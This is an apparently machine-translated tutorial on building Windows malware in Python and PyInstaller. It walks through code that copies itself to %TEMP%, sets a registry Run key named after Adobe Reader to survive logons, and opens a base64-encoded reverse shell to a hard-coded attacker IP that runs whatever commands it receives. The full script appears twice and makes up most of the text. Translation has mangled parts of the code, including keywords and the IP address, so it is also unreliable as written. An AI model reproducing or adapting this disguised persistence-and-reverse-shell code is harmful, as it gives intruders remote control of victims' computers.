Technology sharing: Build poc for malware by using python and PyInstaller
Disclaimer: This article is intended to be shared and never used maliciously!
This article mainly shows how to use python and PyInstaller to build some poc of malware.
As we all know, malware often launch sustained attacks on the target. There are many methods to achieve this in windows. The most common practice is to modify the following registry key: "Software \ Microsoft \ Windows \ CurrentVersion \ Run ". The following code copies the program to the % TEMP % directory using python, and then modifies the registry so that the code can be executed when the user logs on to the computer.
Import sys, base64, OS, socket, subprocess
From _ winreg import *
Def autorun (tempdir, fileName, run ):
# Copy executable to % TEMP %:
OS. system ('Copy % s % s' % (fileName, tempdir ))
# Queries Windows registry for key values
# Appends autorun key to runkey array
Key = OpenKey (HKEY_LOCAL_MACHINE, run)
Runkey = []
Try:
I = 0
While True:
Subkey = EnumValue (key, I)
Runkey. append (subkey [0])
I + = 1
Failed t WindowsError:
Pass
# Set autorun key:
If 'adobe readerx' not in runkey:
Try:
Key = OpenKey (HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
SetValueEx (key, 'adobe _ readerx', 0, REG_SZ, r "% TEMP % \ mw.exe ")
Key. Close ()
Failed t WindowsError:
Pass
After we put the code in the % TEMP % directory and set the continuity, we can execute the next part of the code, reverse shell. Here, I used the reverse shell of python published by TrustedSec, but made some changes-Base64 encoding for network traffic.
Def shell (): # Base64 encoded reverse shell s = socket. socket (socket. AF_INET, socket. SOCK_STREAM) s. connect ('2017. 168.56.1 ', int (443) s. send ('[*] Connection Established! ') While 1: data = s. recv (1024) if data = "quit": break proc = subprocess. popen (data, shell = True, stdout = subprocess. PIPE, stderr = subprocess. PIPE, stdin = subprocess. PIPE) stdout_value = proc. stdout. read () + proc. stderr. read () encoded = base64.b64encode (stdout_value) s. send (encoded) # s. send (stdout_value) s. close () def main (): tempdir = '% TEMP %' fileName = sys. argv [0] run = "Software \ Microsoft \ Windows \ CurrentVersion \ Run" autorun (tempdir, fileName, run) shell () if _ name _ = "_ main _": main ()
Now, when this program is executed, it will open a reverse shell and return it to the "attacker ". In this case, the "attacker" is only a hard-coded ip address in the script, but it is very simple and easy in a domain or on the Amazon cloud. It shows that the program is executed on a Windows host and connected to attackers. You can note that the network traffic here is base64-encoded:
The complete code is as follows:
Import sys, base64, OS, socket, subprocessfrom _ winreg import * def autorun (tempdir, fileName, run): # Copy executable to % TEMP %: OS. system ('Copy % s % s' % (fileName, tempdir) # Queries Windows registry for the autorun key value # Stores the key values in runkey array key = OpenKey (HKEY_LOCAL_MACHINE, run) runkey = [] try: I = 0 while True: subkey = EnumValue (key, I) runkey. append (subkey [0]) I + = 1 Tb WindowsError: pass # If the autorun key "Adobe ReaderX" isn't set this will set the key: if 'adobe readerx' not in runkey: try: key = OpenKey (HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS) SetValueEx (key, 'adobe _ readerx', 0, REG_SZ, r "% TEMP % \ mw.exe") key. close () handle T WindowsError: passdef shell (): # Base64 encoded reverse shell s = socket. socket (socket. AF_INET, socket. SOCK_STREAM) s. connect ('2017. 168.56.1', Int (443) s. send ('[*] Connection Established! ') While 1: data = s. recv (1024) if data = "quit": break proc = subprocess. popen (data, shell = True, stdout = subprocess. PIPE, stderr = subprocess. PIPE, stdin = subprocess. PIPE) stdout_value = proc. stdout. read () + proc. stderr. read () encoded = base64.b64encode (stdout_value) s. send (encoded) # s. send (stdout_value) s. close () def main (): tempdir = '% TEMP %' fileName = sys. argv [0] run = "Software \ Microsoft \ Windows \ CurrentVersion \ Run" autorun (tempdir, fileName, run) shell () if _ name _ = "_ main _": main ()